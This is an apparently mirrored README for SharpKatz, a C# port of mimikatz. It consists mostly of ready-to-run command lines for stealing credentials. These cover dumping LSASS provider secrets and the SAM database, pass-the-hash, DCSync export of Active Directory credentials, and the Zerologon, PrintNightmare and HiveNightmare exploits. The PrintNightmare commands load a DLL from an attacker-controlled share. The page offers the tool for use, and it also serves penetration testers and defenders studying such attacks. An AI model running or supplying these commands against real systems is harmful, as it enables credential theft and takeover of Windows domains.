Giter Site home page Giter Site logo

sharpkatz's Introduction

SharpKatz

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

Usage

Ekeys

SharpKatz.exe --Command ekeys
list Kerberos encryption keys

Msv

SharpKatz.exe --Command msv
Retrive user credentials from Msv provider

Kerberos

SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider

Tspkg

SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider

Credman

SharpKatz.exe --Command credman
Retrive user credentials from Credman provider

WDigest

SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider

Logonpasswords

SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers

List shadowcopies

SharpKatz.exe --Command listshadows
Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject

Lsadumpsam

SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM
Dump credential from provided sam database

Pth

SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password

SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Perform pth to create a process under userdomain\username credential user's rc4 key

SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Replace ntlm hash for an existing logonsession

SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key

DCSync

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username

SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID

SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forder

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by username using alternative credentials

SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by GUID using alternative credentials

SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials

Zerologon

No reference to logoncli.dll, using the direct rpc call works even from a non-domain joined workstation

SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon check

SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon attack

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by username

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by GUID

SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder

Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed here

PrintNightmare CVE-2021-1675 - CVE-2021-34527

SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll
Perform PrintNightmare attack

SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Perform PrintNightmare attack with provided credentials

HiveNightmare CVE-2021-36934

SharpKatz.exe --Command hiveghtmare
Exploit HiveNightmare vulnerability selecting the first available shadowcopy

Credits

This project depends entirely on the work of Benjamin Delpy and Vincent Le Toux on Mimikatz and MakeMeEnterpriseAdmin projects.
The analysis of the code was conducted following the example from this blog post by xpn.

sharpkatz's People

Contributors

b4rtik avatar genbox avatar bugch3ck avatar

Stargazers

SkyN9ne avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.